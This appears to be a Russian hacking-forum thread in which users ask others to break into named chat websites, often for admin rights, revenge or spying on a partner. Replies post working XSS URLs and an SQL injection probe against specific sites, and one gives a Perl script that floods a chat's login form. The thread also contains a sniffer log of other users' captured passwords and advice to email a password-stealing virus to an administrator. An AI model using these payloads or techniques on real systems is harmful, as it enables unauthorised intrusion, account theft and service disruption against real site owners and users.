В последнее время часто начали появляться топы с просьбой проверить тот или иной чат на уязвимости.
Мною было принято решение создать отдельный топик для этих нужд.
Образец заявки:

1) Ссылка на чат
2) Название движка, если оно известно
3) Свои мысли (Что хотите именно сделать, свои попытки взлома)
4) Тестовый логин/пароль для входа
Все заявки оформленные не по образцу будут удаляться, как и флейм тоже...

1) http://chat.kursknet.ru/
2) движок незнаю....
3) оч нужно найти уязвимость.....
свох сил нехвотает пока....нужно найти любые дыры чтоб палучить прва администратора или хотяб админа KASH. для входа
4)
логин:удав пароль:147852
Заранее блогодарен.

http://chat.kursknet.ru/ оч нужно найти уязвимость.....свох сил нехвотает пока....нужно найти любые дыры чтоб палучить прва администратора или хотяб админа KASH. Заранее блогодарен.

РЕГИСТРАЦИЯ ЗАКРЫТА!
Тестовый логин нужен.

Думаю 4 пунктом в образце заявки нужно сделать тестовые логин/пароль, очень часто нужны.

Без логина выудил только пассивную XSS -
http://chat.kursknet.ru/cgi-bin/chat/sub.cgi?action=send_pwd&name="><script>alert("XSS")</script>


Апдейт:
еще XSS
http://chat.kursknet.ru/cgi-bin/chat/sub.cgi?action=userinfo&infoabout="><script>alert("XSS")</script>

спасибо Horsekiller а активных xss нет?

1. wap.mc-chat.kmx.ru
2. название движка неизвестно.
3. Когда захожу в Прихожую, в адресной строке браузера вижу вот что http://wolk-club.ru/chats/enter.php?ci=1307&id=мой ид&pass=мой пароль. Думаю что-то с этим можно сделать.
4. Login: Test, Password: Test.

P.s. Заранее благодарю за помощь в поиске уязвимостей.

wap.mc-chat.kmx.ru

Активная XSS - при написании письма другому пользователю, уязвимые поля :
тема и письмо,
вставляем в каждый по
"><script>alert("XSS")</script>
Получаем по алерту.

1) http://chat.kaktys.ru
2) Название движка неизвестно
3) сниффером выуживается сессия, но при заходе с этой сессии виден только фрейм с паблик сообщениями а неплохо бы было видно все включая настройки
4) login: Test
pass: test

PS : Заранее спасибо!!))

1. http://www.love-chat.ru/voc.php
2. Voodoo 0.90
3. Я как бы только учусь, может что и не так делал но засылал сниф а отдачи никакой потому что как мне объяснили что фильтр его не пускает.
4. login-федя)) pass-филиппова

1. http://chat.by
2. ???
3. Хочу ломануть хоть что-нибудь, нифига в этом не шарю.
4. логин:test пасс:test1

1.http://chatica.ru
2.php.spb
3.Бесят админы скин хеды))
4.логин:dede
pass:15781578

1. http://www.telecom7.ru/Chat
2. Движок незнаю
3. Хочу найти хоть какие нибудь дыры, ...
4. Логин: Advance пароль:12345

http://forum.antichat.ru/search.php?searchid=983823

1) http://hbr.moigorod.ru/chat/
2) неизвесстно
3) стать админом, посылал GET запрос получал IP и номера ID только толку от этого мало
4) Das Gespenst пароль: 1234512345

1. http://chat.mypinsk.com/
2. VOC++ Business Edition
3. активные(пасмвные) XSS, неплохо было бы SQL - короче не знаю по зубам ли тебе потомучто сколько уже не лазили с парнями не искали не чего стоищего нет.....только стоищего а не (document.cookie) и пусто.....короче понятно))))
4. Nik: Linux ; pass: 123123123


надеюсь что-то стоещее получится!!!

1)http://ichat.ru/
2)Software: soft.ICHAT.ru, version: 2.00. Made in Russia.
3) хочется заполучить модера раньше было возможно.. сейчас вроде тоже есть кадры..
4)tester;tester
зарание спасибо...

1. http://chat.siza.ru
2. самописный
3. пробавал прописывать всякие хсс. вот страница с статистикой. http://chat.siza.ru/webalizer/usage_200705.html . есть бд msql точно. пробавал иньекции. но 404 всегда. хочу получить доступ к пассам и логинам бд.
4. логин DENS пароль 1234
Заранее огромное спасибо всем кто посмотрит!

1) http://chat.klintsy.ru
2) понятия не имею
3) поиск дыр для получения прав админа
4) логин: test1 пароль: test1

1) http://www.tarazinfo.kz/chat/index.php
2) Вероятно всего самописный
3) пытаюсь найти как зайти админом, на сайте два админа woogerd и maestro
4) Рега не обязательно можно юзить любой логин

1)www.play.md
2) как я понял это флеш
3)хочется поприкалываться в чате интересуют все возможности естественно за вознагрождение
4)логин q1 пасc 1

////есть такой программист Vadim Isaev (TRoLL), написал чат, но в паблке не нашёл его /////
Кто нить когда нить мне поможетe людиииииии????
пожалуйста!!!!!!!!!!
chat.khabar.kz
login: Nimg
pass: 666
email: jan_onil@mail.ru

Ув. господа.
Помогите, плиз, сломать чат.

1. Линк: www.chat.od.ua
2. Название движка, к сожалению, не знаю.
3. Раньше время от времени баловался, разговаривая в этом чате от имени других людей. Зарегистрированных не трогал, а над гостями-флудерами прикалывался. В этом чате есть файлик "http://www.chat.od.ua/cgi-bin/enter.cgi". Я сохранял его на компе и ставил расширение файла html. В этом файле есть строчка "<input type="hidden" name="session" value="7449_juoIx47MCo">". Этот самый "value" по-идее определяет самого человека. Раньше я ставил туда имя нужного участника, писал в форме всякую похабень, нажимал "отправить" и все, что я написал в чате выходило от имени, стоящего в "value". Потом долгое время чат был в дауне, теперь снова стал обживаться. Но теперь такая фишка не проходит, чат говорит мне о том, что "идентификатор сессии некорректен". Можно входить от имени необходимого пользователя, но тогда сразу становится ясно, что в чате кто-то посторонний, да и при этом нельзя говорить одновременно от имени двух пользователей.
Помогите, плиз. Мне всего лишь нужен доступ к общению от имени незарегеных пользователей. И заодно защита от бана. ::) Помогите, плиз.
4. Тестовый логин: Betta, пароль: aaaaaa.

И еще одна просьба. Зная логин и пароль, подскажите, плиз, как в этом чате сказать фразу зарегистрированным посетителем, не входя в чат.

http://www.odintsovo.info
2) Какой движок незнаю, не видел такого нигде... написано, что сами сделали...asp. может подскажите?
3) Хочу получить админку. админов там походу вообще нет, потому, что на просьбы устранить глюки они не реагируют, да и на вопросы не отвечают... молчат как партизаны. Если я не ошибаюсь там плохая фильтрация в поиске.
4) Тестовый логин - hak / пароль - test

поиск действительно не фильтруется..
http://www.odintsovo.info/main/search.asp?q=%3Cscript%3Ealert%28%27xss%27%29%3C%2 Fscript%3E&x=0&y=0
Что касается двига, то имхо самописный

1) http://chat.nn.ru/index.php
2) не известно
3) я в этом еще не опытен
4) GrandMaster/12853

http://chat.webimperia.eu/
log:savin
pass:12121212

1 www. chat.uamafia.com
2 хз
3 Треба провчити урода админа! свох сил нехвотает пока....!!!нужно найти любые дыры чтоб палучить прва администратора!!!
4 log! dark lord/ 123654
Fenks :)

шось знайшов?
voodoo chat. дыры и способы всзлома ищи в поиске по форуму.
http://chat.uamafia.com/password_reminder.php/?look_for=%3Cscript%3Ealert(/xss/);%3C/script%3E

пожалуйста проверти чат 1..http://wap-chat.ru/c.php
2 незнаю
3 нечего полній профан
ник neksys pass 270689
4 стать админом плиз

www.8u.ru
джижок августовский
ломать его не хочу, а хотелось бы узнать что в нем вобще можно на творить (флуд, просмотр чужих сообщений ну и т.д)

1)http://mpchat.ru/yula/
2)У них вроде свой движок - mpchat2 (как я понял,а сейчас выходит новый mpchat3)
3)У них банят без причины. Нужно найти лекарство против бана и всё что возможно :rolleyes:
4)Логин : MABPuK Пасс : 99097997

у всем кто юзает mpchat свои движки :D

1) http://nik-chat.net/
2) движок незнаю....
3) оч нужно найти уязвимость.....
свох сил нехвотает пока....нужно найти любые дыры чтоб палучить права администратора или хотяб админа KORO. для входа
4)
логин:M@T@DoR пароль:2445
Заранее блогодарен.

1) http://nik-chat.net/
2) движок незнаю....
3) оч нужно найти уязвимость.....
свох сил нехвотает пока....нужно найти любые дыры чтоб палучить права администратора или хотяб админа KORO. для входа
4)
логин:M@T@DoR пароль:2445
Заранее блогодарен.
чат на движке бородина. думаю этим все сказано. поищи по форуму темы... но думаю ты ничего не найдешь.

Спасибо!
приму к сведению!

1) http://www.chatinet.zp.ua
2) Неизвестен, скорей всего самописный ;)
3) Пытался расшифровать хэш юзера..не вышло ;) В нем хранится логин, пароль и еще какие-то рандомные данные, например дата захода. Если узнать хэш юзера, то можно потом сменить любые данные этого юзера..
4) AChat - 32176

нихрена он не самописный... не помню че за двиг, но все-таки это двиг)

http://www.love-chat.ru/
login: 999999
pass: 999999

заранее спасибо ....

1) http://www.chathome.ru/klukva/
2) неизвестно (хочу узнать:)))
3) скажите хотябы какой у него движок..
4) login: test_1 pass: test

1. http://www.galachat.com/
2. не знаю (интересует версия ява-чата)
3. взлом пароля, или хотябы стабильный угон ника через SID (иногда сниффер античатовский ловит сид юзеров зашедших по ссылке на сниф в чате, но очень редко (чем это можно объяснить?))
4. ник любой (если не используется уже).... например: например, пароль не нужен

Пользуйтесь снифферами господа. Это поможет Вам стопроцентно определить IP для начала любого пользователя в чате, а уже потом сломать хоть кого и хоть как в 100 процентов проше. Вот адрес с двумя снифферами: http://www1.hut.ru/aneksniff (http://www1.hut.ru/aneksniff/)

Рекомендую сниффер GreenBear-a: http://s.netsec.ru/ ---> IMHO наилучший =)

Cори неувидел соответствующей темы - парни подбольтайте программу или дайте название - -- нужна работа через проксю по 80 - 8060 портам вопщем н а чат заходить - желательно чтоб обновлялся список проксей и все качественно работало - помогите плис :) с меня плюс

ЗЫ
использовал раньше SocksChain но он чото так тупит всегда - а на новые версии нету коряков - можно и его если у кого есть - цынкуйте в пм ;)

1. http://chat.sumclub.tv/chat
2. не знаю, чат самописный
3. Хочу получить права модера/одмина, чтобы отомстить администрации
4. Логин: Tester
пароль 1111

1. http://chat.sumclub.tv/chat
2. не знаю, чат самописный
3. Хочу получить права модера/одмина, чтобы отомстить администрации
4. Логин: Tester
пароль 1111

мда, только ленивый там шелла не имеет, пароль админа "закодирован" base64 в админке php скрипты через видео файлы заливаются

И как мну это удобно использовать? как можно равкодировать 64 бейс? ни разу не приходилось...

<?
echo base64_decode('строчка');
?>

1) http://da.zp.ua/
2) Название движка неизвестно
3) Я сам был модером, но мне перекрыли эту лавочку. Хотел бы зайти под ником модера или взломать пароль на модерской странице http://da.zp.ua/m
4) ник: алиби пароль 257233

1) www.lom.dp.ua
2) Движок неизвестен
3) на этом форуме нашёл пару примеров вот http://forum.antichat.ru/showthread.php?mode=hybrid&t=34944 но что это даёт и как применить непонимаю, обьясните плз
4) Логин СМЕРТЬ пароль 321

1) http://chat.yugra.net
2) Voodoo
3) Необходимо найти какую либо уязвимость для повышения безопастности чата
4) логин: Gungrave пароль: 173289224238947

1) http://chat.yugra.net
2) Voodoo
3) Необходимо найти какую либо уязвимость для повышения безопастности чата
4) логин: Gungrave пароль: 173289224238947
=\
http://chat.yugra.net/password_reminder.php?look_for=%3Cscript%3Ealert(d ocument.cookie);%3C/script%3E

1. http://miass.ru/chat/
2.Незнаю, только начал изучать...
3.Хочу ему что нибудь сделать, потому что седят там одни алени которые на мои сообщения пишут типо "это нам не интересно и т.п..." Вобщем какие нибудь неуезвимости а потом может сам разберусь...
4. log: Venom ; pass: 123321
Плюсик с меня...

=\
http://chat.yugra.net/password_reminder.php?look_for=%3Cscript%3Ealert(d ocument.cookie);%3C/script%3E
Благодарю

1) www.combats.ru
2) неизвестно
3) начиная от втавления картинок в чат и заканчивая сбором кукис
4) Логин: woakiik
Пароль: 0ok9ij

Спасибо заранее)

1) http://78.47.106.29
2) tusa- chat
3) Необходимо найти какую либо уязвимость для повышения безопастности чата.
4) Логин: tester

Пароль 999

Заранее благодрю

1) http://www.chat.astrakhan.ru
2) скорее всего phpmychat
3) root. admin, moder ну и прочие возможности, путь к базе login : pass.
4) KAZAH : 333
Обнаружил такой баг:
В чате разрещены только 3 тэга: "<B><I><U>" (без кавычек)
если в строке ввода сообщения написать следущее: "<b><i><u><http://</b></i></u>" (без кавычек), обратите внимание если оставить знак открытия тэга перед http:// то у всех посетителей чата будет жирный, курсивный или подчеркнутый шрифт, это зависит от перестановки местами тэгов, если в привате то только у того кому отправили и у вас соответственно, люди конечно возмущаются но толку мало))), баг не всегда, но снимается простой перезагрузкой страницы. Подскажите пожалуйста как правильно использовать эту уязвимость для моих вышеуказаных целей. Заранее спасибо))) :D

http://www.chat.astrakhan.ru

вот пассивная ХСС
http://www.chat.astrakhan.ru/%3Cscript%3Ealert("Xek")%3C/script%3E

http://chat.astrakhan.ru/chat/users_popupH.php3?From=..%2Findex.php3&L=russian&LastCheck=1206018170'+order+by+100/*
Нет времени копать сейчас =/

Horsekiller
Огромное спасибо)))))

ну кто еще мне поможет))))))))))

1) www.gameland.ru/chat
2) Неизвестно
3) Хотелось бы завладеть правами админа.
4) Чат без регистрации.

Буду благодарен за помощ :)

очень надо найти уязвимости двух чатов http://sexchats.ru/
а этот ваще без админа, но админка есть и вот ещё заходи вот так action=”www.citychat.spb.ru/chat.cgi и там требует пароль, зарание всем спасибо

ребята лучше которую я ссылку дал на второй чат, там совсем обноглели, матерят и выкидувают с чата((

Помогите плз оч надо:
1) http://chat.berdyansk.net/
2) двиг похожь на php.spb
3) Нужна админка ....или любые дыры )
4) Чат без регистрации )

помогите пожалуйста : 1)chat.fxxx..ru 2)движок не известен! 3)хотелось бы завладеть правами админа , или узнать как навредить чату (чат слабенький,не выдерживает много народа) 4)ник мда /пароль 123123

http://boltaem.com/

Хотел узнать больше об этого чата. И уязвимости ;))))

Помогите пожалуйста очень надо:
1) http://www.kanevskaya.ru/vchat/voc.php
2) двиг voc chat
3) Нужна админка ....или любые дыры ) или сразу C99MADSHELL.pHP залить )))0
4) vrn;555

1.chat.dndz.dp.ua
2.php.spb
3.модеры задолбали,хочу поломать сервак так чтоб он не пахал вообщё
4.логин Van9 пасс 25101992

Помогите плз оч надо:
1) http://chat.berdyansk.net/
2) двиг похожь на php.spb
3) Нужна админка ....или любые дыры )
4) Чат без регистрации )

Я на потоки ставить боюсь... ну уж очень быстро вешается... чат =((
А так приличный ник флудер...

use LWP::UserAgent;

$ua = LWP::UserAgent->new;

for (1..4) {$nick .= chr(rand(26)+65);}
my $req = HTTP::Request->new(POST => 'http://chat.berdyansk.net/enter.cgi');
$req->content_type('application/x-www-form-urlencoded');
for($i=1000;$i<2000000;$i++)
{
$req->content("room=1&action=enter&name=$nick$i&passwd=$i&type=1&color=000000&refresh=5000");
my $res = $ua->request($req);
print "[~] Ok: $nick$i\n";
}

1.http://chat.artemka.ru/
2.Незнаю
3.Хочу взломать пароль своей девушки_((
4.логин: ploxo
pass: 000

1.http://ebuchka.ru/chat/index.php
2.php. unix
3.Нужен пароль одного из админов (ник *М*я*ф*ф*ф*к*А*~ )
4.Логин Kuka1988
5.пароль 553558

НАУЧИТЕ ВЗЛОМУ ЧАТОВ

Оо чо думаеш вот так существуют книги/пособия по взлому чатов? хы... Без обид.
Лучше всего это изучать php,html,perl и другие языки. Тогда ты понмиаеш чо как работает и где чего можно подсунуть чтоб...

НАУЧИТЕ ВЗЛОМУ ЧАТОВ
мой тебе совет,для начала изучи php,html,языки :cool:

Помогите пожалуйста найти уязвимости на MurClub.ru
Написан на PHP...
За каждую уязвимость по 5 7*значных номеров INV в руки.

1.http://donbass.waplife.net.ua/
2.Двиг писался програмёром.
3.Чат мой. Хочу узнать где есть дыры! Если есть.
4. Логин: test Пароль: test
Если что там и пиши там больше никого нет. Спасибо.

1) http://wap.tulun.net/
2) Незнаю
3) Админы без причины пинают юзеров!
4) логин:Bagbeer,пароль:31758

1) http://www.petrochat.ru/
2) незнаю
3) меня всёвремя банит админ ( надо проучить)
4) login: gum. pass:123

1.http://donbass.waplife.net.ua/
2.Двиг писался програмёром.
3.Чат мой. Хочу узнать где есть дыры! Если есть.
4. Логин: test Пароль: test
Если что там и пиши там больше никого нет. Спасибо.
Пасс передается GETом... значит если человека загнать на подобие сниффера.. в реферрере мы увидем его пасс..

1.http://chat.onego.ru/
2.незнаю
3.тупые админы в чате
4. там не нужно логиться просто написал ник и чатишся

1. murclub.ru
2. Не знаю
3. Ненависть к чату)
4. -
Всем кто поможет по 10 7* INV номеров.
ICQ 325350

1.http://www.farit.ru/
2.незнаю
3.Узнать сколько ещё скрывает причуд этот чат
4. -

Пасс передается GETом... значит если человека загнать на подобие сниффера.. в реферрере мы увидем его пасс..
Ну это я вкурсе, там снифер катит, я сам его так ломал, мне нужно знать есть ли SQL - уязвимость, это меня более интерисует так как я поставил запрет на ссылки и админы информированны, поэтому даже с картинкой не пройдет, вот SQL - уязвимость мне сказали возможна. Прошу помочь...

http://www.chatname.ru
http://www.mpchat.com
http://www.smchat.ru
ето один и тот же самый чат просто много сервесов
построин на непрерывном движоке на С++
я видел тему про мпчат и там сказали что у каждого свой движок...так ето ни так....движок один там...и его редактировать нельзя....адмимны говорят что на даный момент взломать один из чатов нереально...я бы хотел чтобы вы посмотрели..
например етот http://www.chatname.ru/girl
ник empily , пароль empily ..
создал ище там чат чтобы вы посмотрели логин empily. пароль empily
в админку можно попасть с любого выше перечисленого сервиса.

1. http://lovesota.ru/ -wap страница
2. не знаю
3. проконтролировать знакомую. Нужен ее логин\пароль
4. xxx \ xxxx

Похоже, данный топик мертвый :(

delphi-anti

скока даш лаве ?

delphi-anti

скока даш лаве ?
Пиши в личку, давай icq или скайп. Будем поговорить.

Не надо искать "дыры".Достаточно встать на место главного админа чата.Сделать это просто.Создать простой вирус,который считывает информацию,закинуть его на мыло админа(в чатах у главных админов оно в тех.поддержке). Создаем левый ящик,настроитраиваем вирус на него.Раз в два дня вирус будет скидывать вам все пароли и ники,разумеется и ссылки где он зарегистрирован.Шаблоны вируса есь в интернете.Работает на 90%.

www.narod.uz
не знаю
(как бы нагло не звучало) хочу получить права админа
авторизация не важна
заранее благодарю

...::::XSS and wap-chat+video::::...
1)ссылка на chat ::::::.:http://dwap.tj/new_chat/wap/main.php?sid=1224797793
2)ссылка на видео:::::::::: http://narod.ru/disk/5170222000/xss_dwap_1.zip.html
3)движок не известен .
4)вопрос, возможно ли на этом чате сделать более серьёзную атаку по мимо хсс.
5)выкладывайте свои варианты обсудим.

Кто нибудь сталкивался с вап форумом phpbb ?Все переменые передаваемые методом пост и гет фильтруются!Тобишь хсс не прокатить,да и скули там нет кто что посоветует??Очень нужна ваша помощь!Есть исходники но что там смотреть?

1)вот хочу выложить свое первое видео по угону паролей от вап-чатов с помошью сниффака(сниффера).
2)выкладывайте свои версии и варианты тоже.
3)ссылка на видео::::::::: http://narod.ru/disk/5179975000/ugon.zip.html
.................................................. ...........................................
вот сами результаты.
Запрос с dwap.tj — 16.01.2009 03:20
IP: 91.203.96.26 (whois) Real IP*: 217.11.191.108 (whois)
QUERY:
REFERER: http://dwap.tj/chat/info.php?id=12947&password=2848&ver=html&rid=47&uid=13355&nocache=77764
AGENT: Opera/9.50 (J2ME/MIDP; Opera Mini/4.1.10781/574; U; en)

Запрос с dwap.tj — 16.01.2009 07:14
IP: 217.11.191.120 (whois)
QUERY:
REFERER: http://dwap.tj/chat/info.php?id=2437&password=krolik&ver=html&rid=1&uid=13421&nocache=38945
AGENT: Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413

Запрос с dwap.tj — 16.01.2009 09:39
IP: 217.11.191.123 (whois)
QUERY:
REFERER: http://dwap.tj/chat/info.php?id=2527&password=159753456&ver=wml&rid=1&uid=13421&nocache=62708
AGENT: SonyEricssonK790i/R1GB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1

Запрос с dwap.tj — 16.01.2009 09:50
IP: 195.189.142.170 (whois) Real IP*: 217.11.191.74 (whois)
QUERY:
REFERER: http://dwap.tj/chat/info.php?id=1633&password=lamala&ver=html&rid=32&uid=13421&nocache=53907
AGENT: Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1724; ru; U; ssr)





Запрос с dwap.tj — 16.01.2009 11:00
IP: 85.9.129.175 (whois)
QUERY:
REFERER: http://dwap.tj/chat/info.php?id=2379&password=99999&ver=html&rid=1&uid=13355&nocache=96834
AGENT: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/21.0.016; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413

Запрос с dwap.tj — 16.01.2009 11:08
IP: 68.173.150.102 (whois)
QUERY:
REFERER: http://dwap.tj/chat/info.php?id=649&password=00&ver=wml&rid=1&uid=13355&nocache=76308
AGENT: Opera/9.62 (Windows NT 6.0; U; ru) Presto/2.1.1

Запрос с dwap.tj — 16.01.2009 11:14
IP: 85.9.129.175 (whois)
QUERY:
REFERER: http://dwap.tj/chat/info.php?id=2379&password=99999&ver=html&rid=1&uid=13355&nocache=95496

вот еще пару вариантов
1)часть первая ::::::::http://narod.ru/disk/5188166000/admin_wap-chat.zip.html
2)часть вторая http://narod.ru/disk/5189007000/login.zip.html

парни проверте http://www.mayama.ru/ чокаво там можно залести где какие уязвимости - сайт деревенский ....


цука !

парни проверте http://www.mayama.ru/ чокаво там можно залести где какие уязвимости - сайт деревенский ....


цука !

Этот сайт целиком и полностью на ucoz

Этот сайт целиком и полностью на ucoz



И чо ?? тоесть УКОЗ какойто - неуязвим чтоли ???

И чо ?? тоесть УКОЗ какойто - неуязвим чтоли ???
А ты думаешь тебе кто то иньекцию даст...на укозе? ты вообще думаешь о масштабах такой иньекции? Ну максимум XSS..поюзай поиск форума..может ещё найдёшь рабочие XSS На укозе..

Очень хотелось бы проверить этот сайт wap.sotchi.ru на уязвимости... А именно найти способ, залезть под другим ником, под админом и т.д....

Сайт был основательно перекроен, должен был быть сырым. Раньше, здесь проводилась его проверка, сейчас это уже не работает....

Вот результаты этой проверки, может пригодится:
https://forum.antichat.ru/showthread.php?t=58602

Админ, там мудак, просит некоторых девочек присылать свои интим фото, если обидится на них, то пишет гадости про них, или шлет с их ников чушь какую нить....

1) http://www.lom.dp.ua/
2) Неизвесно
3) Если можно прова админа или украсть куки
4) log/123456

Надо поддержать тему

1) x-zone.chatium.com
2) Джава чат
3) Хочу узнать баги и способ заставить админов нервничать
4) Вход без регистрации

Такая ситуация: в чат можно войти только через телефон, т.е. чат пропускает только определенные ip. wap.chatrix.net
нашел вот такую ссылку http://wap.chatrix.net/admin/ip/
вносил туда другие периоды ip-шников вплоть от 0.0.0.0 до 255.255.255.255
как то раз все таки пустило через комп и браузер winwap 4.1
подскажите что нужно сделать чтобы пропускало ip не указанные в этой таблице
повторюсь что если просто например у меня допустим ip 192.168.88.90
то выставление периода с 192.168.80.0 по 192.168.255.255 не прокатывает - может нужно перезагрузить сам сервер для того чтобы все заработало? кнопку S тоже юзал в этой таблице но пока ничего добится не могу.
p.s. извините что оформлено не по правилам но думаю вас должен заинтересовать данный вопрос =)

чат на
раньше удовалось флудить - InetCrack.exe теперь чото они там прикрыли и нелезет , что они зделали и как поправить можно ?

вот пакет к примеру перехваченый НавиСкопом :
POST http://mayama.ru/mchat/?1911847.28393168 HTTP/1.0
x-requested-with: XMLHttpRequest
Accept-Language: ru
Referer: http://mayama.ru/mchat/
Accept: application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WebMoney Advisor; MRA 4.3 (build 01218); .NET CLR 2.0.50727)
Host: mayama.ru
Content-Length: 72
Proxy-Connection: Keep-Alive
Cookie: mcnm=NIKNAME; mcem=; 5revdafmuzll=1239106243; 5revdafmuispm=1-3; 5revdafmpoc=DgE%3D; 5revdafmuCoz=uz%3D726024f13a0375b63b292e24c6144b6d 0524562de0886ab86fabcc12b69ddf7db48d6c87ea01496cf6 af279533f8b082170886ca4a4d700e485dc14dbe78b932e1b5 7ce08a15784fc9183a735f890250ecdcbc893470973192857c 7821fb17acb3154a5805b17b6b6c540358dc52e1869c135cfb 9e49cc96f36eb586bc2a9e%2Cses%3D3961384d37765958524 5766f4d0886

uname=NIKNAME&message=MESSAGE+&s=101144471711711064067&numa=0&a=8&ajax=1


У кого какие соображения ?

1)http://city.vatchenko.com/
2)Движок неизвестен
3)Хочу прокачать персонажа и узнать пароли пользователей
4)логин locid пароль 26742674

1)http://chat.kuban.ru/cgi-bin/chatpro.cgi обычный вход
http://chat.kuban.ru/cgi-bin/pro/ol.en админский вход
2)логин реквием, пароль реквием

пока незнаю вооще с чего начинать, но хотелось бы получить админский паролик раньше он у меня был (вот такой Логин: Олень
пароль: я люблю тебя жизнь) ща нет)))

http://chat.x-wapa.net или http://chat.x-wapa.net/enter.php?ver=wap&id=1604&ps=qweqwe чат региона изменен! не могли бы проверить на дыр и т.п. (прошу не сносить) и ЕЩЕ Это ВАП чат!

http://best-torrents.fvds.ru/ чат на трекере плиз спеца )))))где вы))))

http://www.ostrovok.com/
движок не известен.
логин: Жаж. пасс 5656

1) http://psix.palata6.su/
2) Неизвестно
3) Ну свои мыслей к сожалению как то нет, возможно только мысль о том, что нет ограничений по символам и нет фильтра при вводе цвета.
4) чат без регистрации

1) www.javagala.ru
2) На каком движке стоит чат мне не известно.
3) что бы найти что то мне кажется для начало нужно знать java скрипт.Этот чат уже запущен на PC на официальном сайте на форуме написано как запустить чат на компе.Почему я хочу чтоб этот чат посмотрели: потому что еще никто ничего не находил вот и я хочу посмотреть ваши силы на что кто способен.Если найдете что или появятся вопросы пишите в ЛС.Кстате я заплачу за вашу работу если найдете что нибудь стоищее.
4) При входе в чат появится вкладка восстановления персонажа туда нужно ввести этот код: SXL4B5YYAO
Ник персонажа: Test-Antichat

_http://world-attack.ru/ нужно проверить на SQL,и разную чтуку,буду очень благодарен...

хм...могу помочь

sawat, там булка, чата нету!
внимательно посмотри первый пост

1)чата нету
2)булка 3.8.2
3)нужно проверить на любые баги (в первую очердь XSS и SQL)
4)news-bot:4135584

Всем привет, Люди подскажите пожалуйста, для верссии
JimBot_0.3.6_beta1 вышли новые скрипты или они ко всем версиям походят?
Если что, могу купить скрипты, вот моя аська 560-924-828

Люди подскажите, почему когда Я запускаю Danwer у меня на компе начинаються страшные лаги

1) http://sms.h2m.ru/chat/ (http://sms.h2m.ru/chat/)
2) самописный
3) найти любые уязвимости
4) Тестовый логин: testUser/пароль для входа: test123

1) http://super.mpchat.ru/
2) к сожалению не знаю(
3) хотелось бы достать пароль (хэш) LadyBoSS (она админ)
4) Логин: Test пароль: 123456

А вы непробывали взламать chat.mail.ru .

1) http://super.mpchat.ru/
2) к сожалению не знаю(
3) хотелось бы достать пароль (хэш) LadyBoSS (она админ)
4) Логин: Test пароль: 123456
http://sms.h2m.ru/chat/in.php?url=%22%3E%3Cscript%3Ealert();%3C/script%3E%3Cbr

http://sms.h2m.ru/chat/in.php?url=%22%3E%3Cscript%3Ealert();%3C/script%3E%3Cbr Это ты не ко мне похоже обратилсяЮ, а к чуваку сверху да?

1.http://pskovchat.ru
2. не знаю. хотел бы узнать
3. поиск дыр
4. ыть/0665754

1)http://chat.waw.su/ 2)незнаю 3)найти уязвимости 4)логин:матрица555.пороль:55555 Я в нем тока переворачивал строницу в зеркальном отоброжение и отдельно пост и синтоксичекую ошибку делал я так думаю там должно быть еще что нибудь ну чет я не найду посмотрите вы тогда

1) chat.waw.su 2)незнаю 3)найти уязвимости 4)логин:матрица555.пороль:55555 Я в нем тока переворачивал строницу в зеркальном отоброжение и отдельно пост и синтоксичекую ошибку делал я так думаю там должно быть еще что нибудь ну чет я не найду посмотрите вы тогда
Если че пишите мне на почту вот matric85@mail.ru

короче эта тема тоже не работает так закрывайте ее тогда че она тогда эфир загризняет

1) http://chat.krasnokamensk.ru/
2) php.spb (бородинский) поколечиный маленько нашей администрацией
3) хотелось бы узнать дыры, лазейки какие нибудь, хотя я и сам администратор,, но хотелось бы доступ к админке получить так как прав маловато ) сам пробывал ломать, но мало что поучилось что то уж слишком они намудрили ))
4) ник: Test2009 пасс: test

chat.games.ru
2) Неизвесно
3) Если можно прова админа или украсть куки
4) log/123456

chat.didrov.ru
неизвестно
просто скажите, дальше сам попытаюсь)
логин watch_out пасс 14789

1)sim.md
2) не известно
3) логин: petrov пасс: 123456
хочу узнать какие есть дыры,чё можно сделать.по возможности права админа или модератора.при многом благодарен

1) http://chat.maranatha.org.ua/
2) кажется VooDoo
3) Нужен доступ в админку.Деньги чата(где-то дырка есть...Из-за неё столько народа забанили))
4) Login: Surfer, Password: 123456789.
Заранее благодарю. :)

1) http://www.schat.org.ua/
2)??? незнаю ??? :confused:
3) Хотелось бы узнать уязвимость как обойти http://www.schat.org.ua/pop.php в этом чате... я знаю тут много "дырок" в этом чате , но обойти эту... неизвестно!
4)золото \ 123321

1.love.wapos.ru/chat/
2.Незнаю
3.Ломать ник,права админа
4 ТЕСТ1:1234